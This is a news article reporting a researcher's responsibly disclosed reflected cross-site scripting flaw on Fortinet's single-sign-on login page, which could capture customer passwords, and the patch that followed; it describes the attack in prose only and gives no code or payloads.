Just the bug nation-state actors were looking for

Mar 4, 2016 13:11 GMT  ·  By

The Fortinet login page used by the company's customers was vulnerable to a reflected cross-site scripting (RXSS) attack that allowed attackers to log their passwords in cleartext.

Fortinet is a US cyber-security vendor, one of the biggest suppliers of security products and services, right up there with Cisco, Check Point, and Juniper in terms of size and reputation.

Fortinet login page contained a reflected XSS

According to French security researcher Yann Cam, working for information security firm Synetis, Fortinet's SSO (Single-Sign-On) login system contained a vulnerability that allowed attackers to insert malicious parameters inside the login page's URL.

Since Fortinet redirects users who access other services to the login.fortinet.com domain using extremely long and complicated URLs, the attacker would find it easy to hide their malicious code inside it.

In his tests, Mr. Cam created a malicious JS file, which he hosted on his server while loading alongside the rest of the legitimate Fortinet login page.

This malicious file was altering code in the original Fortinet login page and thus allowed the attacker to hijack the login form, sending authentication data to one of his servers, where it was logged.

No need for phishing pages, the XSS was more than enough

"In this case, the RXSS is located directly on the centralized authentication page. Thus, no need to create a fake login page to deceive potential victims," Mr. Cam explains.

An attacker using this exploit could access a Fortinet customer's account and see what kind of security equipment they bought, gaining crucial information needed to plan future attacks.

If the customer had reused the Fortinet username/password on other sites or even security devices, then the attacker would have had a simple key to many of the victim's assets.

Mr. Cam discovered the issue on November 6, 2015, and Fortinet patched it on December 2, 2015. The reason details about this bug are only now coming to light is that Mr. Cam also identified a second XSS in Fortinet's ticketing software and waited for Fortinet to patch that one as well. Fortinet does not run a bug bounty program, so there was no additional monetary reward for Mr. Cam's work.

The proof-of-concept video that Mr. Cam provided Fortinet can be viewed below. Softpedia has also contacted Fortinet for an official response regarding this issue, and inquired about suspicious logins during the past year, along with the type of data an attacker could have accessed.